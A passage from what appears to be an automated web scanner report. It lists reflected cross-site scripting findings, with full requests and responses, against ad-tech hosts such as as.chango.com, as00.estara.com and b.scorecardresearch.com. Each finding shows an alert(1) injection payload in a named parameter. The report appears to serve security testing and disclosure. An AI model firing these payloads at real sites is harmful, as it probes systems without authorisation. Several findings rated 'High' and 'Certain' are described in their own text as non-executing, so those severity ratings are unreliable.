Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d27"><script>alert(1)</script>1cc8286ed8d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a5b401f71e5148799a6f2423b07d4cd73d521042"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:54 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:54 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:54 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d&cu=&dsi=None&clickURL=">
...[SNIP]...

4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d371f"><script>alert(1)</script>a5fc9f67176 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broadd371f"><script>alert(1)</script>a5fc9f67176&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "70973571812951c51d2d4496427748c19bd89484"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:40 GMT
Content-Length: 2361
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:40 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadd371f%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ea5fc9f67176; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:40 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broadd371f"><script>alert(1)</script>a5fc9f67176&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickUR
...[SNIP]...

4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b637"><script>alert(1)</script>76dda13d31e was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f33fc4f1aaa842e9b43349e461b453f890502a86"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:43 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:43 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk1b637%22%3E%3Cscript%3Ealert%281%29%3C/script%3E76dda13d31e%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:43 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599983.43;click1=http://as.chango.com/links/click1317599983.45?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259
...[SNIP]...

4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c05"><script>alert(1)</script>f38714b81ab was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "d3186fb91500f90491eca40b2def79ca69709121"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:50 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:50 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:50 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
d=1317599990.48;click1=http://as.chango.com/links/click1317599990.49?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&
...[SNIP]...

4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd2d"><script>alert(1)</script>60dd599054f was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300afd2d"><script>alert(1)</script>60dd599054f&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "56e6cc8d003260b1dbdb5eff69d7d20a9c15541b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:51 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:51 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300afd2d"><script>alert(1)</script>60dd599054fpx; height: 250px; margin: 0; padding: 0;">
...[SNIP]...

4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80641'%3balert(1)//6c9e0c7792f was submitted in the template parameter. This input was echoed as 80641';alert(1)//6c9e0c7792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106297609&template=85669580641'%3balert(1)//6c9e0c7792f&checklinkstatus=1&var2=912&var6=5860EEFA281121EC93852AEC182A3278&var7=912&var10=http%3A//travela.priceline.com/hotel/searchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Length: 10170
Content-Type: application/x-javascript


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['85669580641';alert(1)//6c9e0c7792f'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...

4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c1 property in the COMSCORE.beacon({...}) call. The payload 3f294<script>alert(1)</script>398e6a34688 was submitted in the c1 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=83f294<script>alert(1)</script>398e6a34688&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:48 GMT
Date: Sun, 02 Oct 2011 23:52:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"83f294<script>alert(1)</script>398e6a34688", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c10 property in the COMSCORE.beacon({...}) call. The payload 724b2<script>alert(1)</script>af07be835b7 was submitted in the c10 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=724b2<script>alert(1)</script>af07be835b7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:54 GMT
Date: Sun, 02 Oct 2011 23:52:54 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"724b2<script>alert(1)</script>af07be835b7", c15:"", c16:"", r:""});



4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c2 property in the COMSCORE.beacon({...}) call. The payload 66acc<script>alert(1)</script>97f36e4c3b7 was submitted in the c2 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=8&c2=603621166acc<script>alert(1)</script>97f36e4c3b7&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:49 GMT
Date: Sun, 02 Oct 2011 23:52:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"603621166acc<script>alert(1)</script>97f36e4c3b7", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c3 property in the COMSCORE.beacon({...}) call. The payload 1371e<script>alert(1)</script>3fbe42d830d was submitted in the c3 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=8&c2=6036211&c3=1371e<script>alert(1)</script>3fbe42d830d&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:50 GMT
Date: Sun, 02 Oct 2011 23:52:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"1371e<script>alert(1)</script>3fbe42d830d", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

